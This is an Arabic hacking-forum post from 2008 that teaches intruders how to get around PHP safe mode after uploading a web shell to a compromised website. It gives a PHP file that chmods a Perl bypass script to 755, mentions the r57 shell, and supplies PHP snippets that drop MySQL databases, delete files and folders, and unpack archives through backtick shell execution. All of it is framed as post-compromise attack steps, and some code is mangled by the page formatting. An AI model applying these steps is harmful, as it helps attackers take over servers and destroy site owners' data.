عرض مشاركة واحدة
قديم 10-25-2008, 02:24 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Crazy Dz
 
الصورة الرمزية Crazy Dz
 

 

 
إحصائية العضو







Crazy Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى Crazy Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
Crazy Dz is on a distinguished road

افتراضي استغلال الدوال بطريقة احترافية



السلام عليكم ورحمة الله
الدرس كنت نزلتة من فترة كان المنتدى مقفول حبيت اضعة بالمنتدى
التحكم فى الملفات واعطاء تصاريح فى وضع السيف موود اون
الكثير منا عندما يستغل اى ثغرة تمكنة من رفع شيل يواجة السيف مود
الحاجز بينة وبين سطر الاوامر ويتطرق لتخطى السيف موود بعدة طريق
واساليب منها السى جى اى وشيل الــ r57 بلغة البيرل ولاكن تواجهنا مشكلة أعطاء تصريح 755 للملف وهنا السؤال ازاى ادى تصريح وانا مش قادر انفذ اوامر
الطريقة الاعتيادية لأعطاء تصريح لملف بيرل عن طريق سطر الاوامر
بالامر التالى chmod file.pl 755
طيب احنا ديماّ بنشوف الدوال الممنوعة ونسمع ان فى دوال خطر انها تفضل شغال ولابد ايقافها لكن مش كلنا نعرف استغلال الدوال دى فى الاختراق
اول حاجة جزء كبير منا بينفذ الاوامر وهوة فاهم فيدتها اية لكن
معندوش دراية خطوات تنفيذ الامر اية يعنى مثلاّ
الامر chmod file.pl 755
chmod هى دالة فى البى اتش بى
عن طرقها بندى تصريح لملف او فولدر وبنستغلها عن طريق سطر الاوامر فى حالة السيف موود اوف لكن فى حالة ان السيف موود اون
البعض منا يعتقد ان بذالك لا يمكن اعطاء اوامر او صلاحيات الخ..
الدرس اليوم استغلال الدوال بطريقة احترافية اتكلمت كتير تعالو نتطرق للمهم فى الدرس
=============
رفعنا شيل على اى موقع والسيف مود كان اون ومش قدرين ندى تصريح لملف البيرل علشان نتخطي ونفذ اوامر برحتنا
طيب ارفع ملف البيرل بتاعك فى اى فولدر فية تصريح او بنفس الطريقة اللى رفعت الشيل منها للموقع
تانى حاجة اعمل ملف تكست جديد وحط فية الكود دة

كود PHP:
<?  
chmod
("file.pl" 0755);  
?>
= اسم ملف التخطى بلغة البيرل الذى يحتاج لتصريح 755 لتخطي السيف مود
سيف الملف بأى اسم دوت php بعد كدة ارفعة للموقع بنفس طريقة رفع الشيل وافتحة من المتصفح واتوجة للشيل مرة اخرى ستجد ان الملف
اخد تصريح 755 ويمكنك استخدام ملف البيرل لتحقيق هدفك من الاختراق بعد اعطاء التصريح .
نكمل الدرس مع بعض الدوال
mysql_drop_db
وظيفة الدالة مسح قاعدة بيانات ودة مثال بسيط على الاستغلال
كود PHP:
?  
// الاتصال  
$connect mysql_connect("localhost""user""password");  
// التحقق من الاتصال   
if (!$connect) {  
echo 
"لم يتم الاتصال";  
exit;  
}  
// الداله التي قمنا بشرحها  
$drop mysql_drop_db("DBname");  
//التحقق من الحذف  
if ($drop) {  
echo 
"تم حذف قاعدة البيانات بنجاح";  
}  
else {  
echo 
"لم يتم حذف القاعدة";  
}  
?> 
ودى بعض الاستغلالات لبعض الدوال
كود PHP:
<?  
$filename 
"file.php"
$del unlink($filename);   
if (
$del) {  
echo 
"تم الحذف";  
}  
if (!
$del) {  
echo 
"لم يتم الحذف";  
}  
?>
كود PHP:
<?  
$foldername 
"antisec";  
$remove rmdir($foldername);  
if (
$remove) {  
echo 
"تم الحذف بنجاح !!";  
}  
if (!
$remove) {  
echo 
"لم يتم الحذف";  
}  
?>
كود PHP:
<?  
mkdir
("DirName" 0777);  
?>
يوجد دوال لفك الظغط

ودة كود لفك الظغط
كود PHP:
 <?php 
$zip 
zip_open("0.zip"); 
if (
$zip) { 
  while (
$zip_entry zip_read($zip)) { 
    
$fp fopen("zip/".zip_entry_name($zip_entry), "w"); 
    if (
zip_entry_open($zip$zip_entry"r")) { 
      
$buf zip_entry_read($zip_entryzip_entry_filesize 

($zip_entry)); 
      
fwrite($fp,"$buf"); 
      
zip_entry_close($zip_entry); 
      
fclose($fp); 
    } 
  } 
  
zip_close($zip); 

?>
كود PHP:
  <? 
$path 
'/home/user/public_html/'
$file '0.zip'

$path_parts pathinfo($file); 
$ext $path_parts[extension]; 

if(
$ext == 'gz'

    
$execute "gunzip -".$path.$file"
    `
$execute`; 

if(
$ext == 'zip'

    
$execute "unzip -u $file -d $path"
    `
$execute`; 

?>
zip.0

اسم الملف اللى عايز تفك ظغطة


ملف في المرفقات
موضوع منقول للأهمية





hsjyghg hg],hg f'vdrm hpjvhtdm

الملفات المرفقة
نوع الملف: txt 1.txt‏ (161 بايت, المشاهدات 9)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع

http://im9.gulfup.com/2011-09-14/1316009561971.jpg

 

   

رد مع اقتباس